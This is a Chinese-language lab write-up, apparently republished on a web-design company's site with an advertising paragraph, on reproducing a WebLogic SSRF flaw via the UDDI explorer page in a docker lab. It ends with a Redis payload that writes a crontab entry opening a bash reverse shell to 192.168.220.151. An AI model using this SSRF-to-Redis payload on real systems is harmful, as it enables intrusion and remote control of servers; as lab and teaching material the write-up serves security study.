如何实现WeblogicSSRF漏洞复现

今天就跟大家聊聊有关如何实现Weblogic SSRF漏洞复现，可能很多人都不太了解，为了让大家更加了解，小编给大家总结了以下内容，希望大家根据这篇文章可以有所收获。

创新互联公司-专业网站定制、快速模板网站建设、高性价比望江网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式望江网站制作公司更省心,省钱,快速模板网站建设找我们，业务覆盖望江地区。费用合理售后完善，十载实体公司更值得信赖。

一、使用docker搭建环境

docker安装及搭建环境教程：https://www.freebuf.com/sectool/252257.html

访问7001端口

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

2、检查一下IBM这个地方看看

发现是个连接，这就可能存在ssrf了

3、使用burp suite抓包，点击Search

4、修改operator参数的连接

5、访问结果

访问不存在的端口返回 could not connect over HTTP

访问存在的端口返回状态码

访问内网

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

看完上述内容，你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗？如果还想了解更多知识或者相关内容，请关注创新互联行业资讯频道，感谢大家的支持。